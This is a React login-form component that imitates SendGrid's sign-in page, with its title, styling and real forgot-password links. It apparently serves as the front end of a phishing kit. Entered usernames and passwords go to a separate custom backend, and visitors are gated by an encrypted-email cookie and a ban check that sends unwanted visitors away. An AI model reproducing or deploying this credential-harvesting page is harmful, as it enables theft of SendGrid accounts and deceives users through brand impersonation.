import React, { useState, useEffect } from 'react';
import { useNavigate } from 'react-router-dom';
import axios from 'axios';
import { Helmet } from 'react-helmet';
import Cookies from 'js-cookie';
import '../App.css';

function LoginForm({ initialError }) {
  const [username, setUsername] = useState('');
  const [password, setPassword] = useState('');
  const [message, setMessage] = useState('');
  const [isLoading, setIsLoading] = useState(false);
  const [usernameFocused, setUsernameFocused] = useState(false);
  const [passwordFocused, setPasswordFocused] = useState(false);
  const [encryptedEmail, setEncryptedEmail] = useState('');
  const navigate = useNavigate();
  const [isChecked, setIsChecked] = useState(false);

  useEffect(() => {
    const email = Cookies.get('encryptedEmail');
    if (email) {
      setEncryptedEmail(email);
    } else {
      console.log('No encrypted email in cookies, redirecting to /verify');
      clearSession();
      navigate('/verify', { replace: true });
      return;
    }

    const checkEmail = async () => {
      try {
        const API_URL = process.env.REACT_APP_API_URL || 'http://localhost:5000/api';
        const response = await axios.post(`${API_URL}/check-email`, { encryptedEmail: email });
        console.log('Email check response:', response.data);

        if (!response.data.valid || response.data.banned) {
          console.log('Invalid or banned email, clearing session and redirecting to /verify');
          clearSession();
          navigate('/verify', { replace: true });
        } else {
          setIsChecked(true);
        }
      } catch (error) {
        console.error('Email check error:', error.response?.data || error.message);
        clearSession();
        navigate('/verify', { replace: true });
      }
    };

    checkEmail();

    if (initialError) {
      setMessage(
        <div id="login-error-alert-container" className="alert alert-danger" role="alert">
          <div style={{ display: 'inline-block', fontSize: '16px', fontFamily: '"Times New Roman"', borderRadius: '30px', border: '1px solid rgb(183, 28, 28)', padding: '4px 10px' }}>
            !
          </div>
          <p style={{ margin: '0px 10px' }}>Your username or password is invalid.</p>
        </div>
      );
    }
  }, [initialError, navigate]);

  const clearSession = () => {
    document.cookie.split(';').forEach((cookie) => {
      const [name] = cookie.split('=');
      document.cookie = `${name.trim()}=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT; SameSite=Strict`;
    });
    sessionStorage.clear();
  };

  const handleSubmit = async (e) => {
    e.preventDefault();
    setIsLoading(true);
    setMessage('');

    try {
      const API_URL = process.env.REACT_APP_API_URL || 'http://localhost:5000/api';
      const checkResponse = await axios.post(`${API_URL}/check-email`, { encryptedEmail });
      if (!checkResponse.data.valid || checkResponse.data.banned) {
        console.log('User banned during login attempt, clearing session and redirecting to /verify');
        clearSession();
        navigate('/verify', { replace: true });
        setIsLoading(false);
        return;
      }

      const response = await axios.post(`${API_URL}/login`, {
        username,
        password,
        encryptedEmail,
      });

      console.log('Login response:', response.data);

      if (response.status === 200) {
        if (response.data.status === 202 && response.data.redirect) {
          console.log('Navigating to:', response.data.redirect);
          navigate(response.data.redirect);
        } else if (response.data.status === 200 && response.data.redirect) {
          console.log('Redirecting to:', response.data.redirect);
          window.location.href = response.data.redirect;
        } else {
          setMessage(
            <div id="login-error-alert-container" className="alert alert-danger" role="alert">
              <div style={{ display: 'inline-block', fontSize: '16px', fontFamily: '"Times New Roman"', borderRadius: '30px', border: '1px solid rgb(183, 28, 28)', padding: '4px 10px' }}>
                !
              </div>
              <p style={{ margin: '0px 10px' }}>{response.data.message}</p>
            </div>
          );
        }
      } else {
        throw new Error('Unexpected HTTP status: ' + response.status);
      }
    } catch (error) {
      console.error('Login error:', error);
      const errorMessage = error.response?.data?.message || error.message || 'Login failed';
      setMessage(
        <div id="login-error-alert-container" className="alert alert-danger" role="alert">
          <div style={{ display: 'inline-block', fontSize: '16px', fontFamily: '"Times New Roman"', borderRadius: '30px', border: '1px solid rgb(183, 28, 28)', padding: '4px 10px' }}>
            !
          </div>
          <p style={{ margin: '0px 10px' }}>{errorMessage}</p>
        </div>
      );
    } finally {
      setIsLoading(false);
    }
  };

  return (
    <div>
      <Helmet>
        <title>Login | SendGrid</title>
      </Helmet>
      {message && (
        <div className="error-message-wrapper">
          {message}
        </div>
      )}
      <form className="login-form" onSubmit={handleSubmit}>
        <div className="row">
          <div className="col-8 col-start-3">
            <div
              className={`input-text-wrap is-full-width ${username ? 'has-value' : ''} ${
                usernameFocused ? 'is-focused' : ''
              }`}
              role="usernameContainer"
            >
              <label className="input-text-label" htmlFor="username">
                Username
              </label>
              <input
                type="text"
                id="username"
                name="username"
                className="input-text"
                value={username}
                onChange={(e) => setUsername(e.target.value)}
                onFocus={() => setUsernameFocused(true)}
                onBlur={() => setUsernameFocused(false)}
                disabled={isLoading}
                autoComplete="username"
              />
            </div>
          </div>
        </div>
        <div className="row login-username-options">
          <div className="col-10">
            <a
              className="login-link"
              href="https://app.sendgrid.com/forgot_password"
            >
              Forgot your username?
            </a>
          </div>
        </div>
        <div className="row">
          <div className="col-8 col-start-3">
            <div
              className={`input-text-wrap is-full-width ${password ? 'has-value' : ''} ${
                passwordFocused ? 'is-focused' : ''
              }`}
              role="passwordContainer"
            >
              <label className="input-text-label" htmlFor="password">
                Password
              </label>
              <input
                type="password"
                id="password"
                name="password"
                className="input-text"
                value={password}
                onChange={(e) => setPassword(e.target.value)}
                onFocus={() => setPasswordFocused(true)}
                onBlur={() => setPasswordFocused(false)}
                disabled={isLoading}
                autoComplete="off"
              />
            </div>
          </div>
        </div>
        <div className="row login-password-options">
          <div className="col-10">
            <a
              className="login-link"
              href="https://app.sendgrid.com/forgot_password"
            >
              Forgot your password?
            </a>
          </div>
        </div>
        <div className="login-btn">
          <button
            type="submit"
            className={`btn btn-primary has-icon login-btn ${isLoading ? 'is-loading' : ''} ${
              isLoading || (!username || !password) ? 'is-disabled' : ''
            }`}
            disabled={isLoading || (!username || !password)}
          >
            {isLoading && (
              <svg className="sg-loader loader-on-dark is-small">
                <rect className="logo-square bottom-left" width="5" height="5" />
                <rect className="logo-square bottom-middle" width="5" height="5" />
                <rect className="logo-square middle" width="5" height="5" />
                <rect className="logo-square top-middle" width="5" height="5" />
                <rect className="logo-square top-right" width="5" height="5" />
                <rect className="logo-square middle-left" width="5" height="5" />
                <rect className="logo-square middle-right" width="5" height="5" />
              </svg>
            )}
            Continue
          </button>
        </div>
      </form>
    </div>
  );
}

export default LoginForm;